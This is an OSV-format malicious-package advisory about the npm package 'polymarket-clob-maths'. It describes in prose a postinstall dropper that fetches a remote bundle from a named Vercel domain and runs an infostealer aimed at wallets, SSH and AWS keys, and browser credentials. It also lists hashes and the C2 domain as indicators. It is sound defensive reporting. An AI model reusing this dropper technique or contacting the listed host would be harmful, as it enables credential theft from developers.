{"id":"MAL-2026-6691","summary":"Malicious code in polymarket-clob-maths (npm)","details":"Malicious npm package published as part of a coordinated DeFi-themed infostealer campaign targeting Polymarket developers. `polymarket-clob-maths` uses a dropper technique: a `postinstall` hook fetches a remote bundle from `trabalhos-flax.vercel.app` and executes a `syncSession()` function that runs a second-stage infostealer. The payload harvests cryptocurrency wallet vaults, browser credentials, SSH keys, AWS credentials, developer secrets, and password manager databases, then exfiltrates the data to the attacker-controlled C2.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (9e5747b377bb17f8131b894ccdae41919423fb3c8a77d286084bcfaf9654e4ac)\nOn npm install, the declared postinstall hook (node scripts/install-check.cjs) fetches a JSON config from https://trabalhos-flax.vercel.app/config/clob-math.json, parses a bundle URL from the response, downloads a tgz to a temp directory, extracts it, runs `npm install` inside the extracted directory, then require()s peer-math.js from that bundle and invokes syncSession(). The fetched archive is unpinned, has no integrity check (no hash, no signature), and is hosted on a third-party Vercel app unrelated to Polymarket. The attacker fully controls the executed code on each install, and can change it at any time without republishing the npm package. The package additionally impersonates the Polymarket / @polymarket CLOB ecosystem: the published name is `polymarket-clob-maths` while the README is titled `polymarket-stake-math` and instructs users to `npm install polymarket-stake-math`, indicating namespace confusion against the legitimate Polymarket tooling. Cover-story naming (PSM_PEER_URL, KELLY_PEER_CONFIG, log strings calling the operation an `install check` / `peer sync`) and silenced errors (`console.warn('[polymarket-stake-math] install check skipped:', msg)`) hide the dropper behavior from a casual installer.\n","modified":"2026-07-01T21:16:42.501992335Z","published":"2026-06-30T00:00:00Z","database_specific":{"malicious-packages-origins":[{"versions":["3.3.9"],"sha256":"233e641c7fca2c1ff2f63a05777ad23c3fbd13c3a14071569ddc95368794862d","modified_time":"2026-07-01T20:37:40Z","id":"IN-MAL-2026-007887","import_time":"2026-07-01T21:04:20.144159826Z","source":"amazon-inspector"},{"versions":["2.3.9"],"sha256":"9e5747b377bb17f8131b894ccdae41919423fb3c8a77d286084bcfaf9654e4ac","modified_time":"2026-07-01T20:37:48Z","id":"IN-MAL-2026-007888","import_time":"2026-07-01T21:04:20.210934065Z","source":"amazon-inspector"}]},"references":[{"type":"REPORT","url":"https://safedep.io/defi-infostealer-fake-arbitrage-bot-npm/"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/polymarket-clob-maths/v/3.3.9"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/polymarket-clob-maths/v/2.3.9"}],"affected":[{"package":{"name":"polymarket-clob-maths","ecosystem":"npm","purl":"pkg:npm/polymarket-clob-maths"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}],"versions":["3.3.9","2.3.9"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/polymarket-clob-maths/MAL-2026-6691.json","indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-2r4jpAM871TzVxWKLZCTslvYp93rjQ9YDIYCmtCT/Is4Ulk035CJR3veBdv1tGtwHiUC2DtLigTsdbQAONDS5A==","sha1":"89f890724fd26e1c8fad6f582188530d1b5c05fd"},"filename":"polymarket-clob-maths-3.3.9.tgz"}],"evidence_files":[{"sha256":"6802db59168709186a085f1bf6c162288ae0482d66a35816bda9f0704d0b709b","tlsh":"59a1459519a2727746b1ebb8c722901dfe2340233521c350f6de96952fb72a4c352dec","path":"scripts/install-check.cjs"},{"sha256":"6c66f29924a4968ae15f898d5b4ef4245302f64a9179593429a69283c8e8473d","tlsh":"d9f07237daa04e3668b88f9d4e681604f4680b1f32b04d0bb0bba01c0fb2273045b73a","path":"package.json"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"iocs":{"domains":["trabalhos-flax.vercel.app"]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"SafeDep","contact":["https://safedep.io"],"type":"FINDER"}]}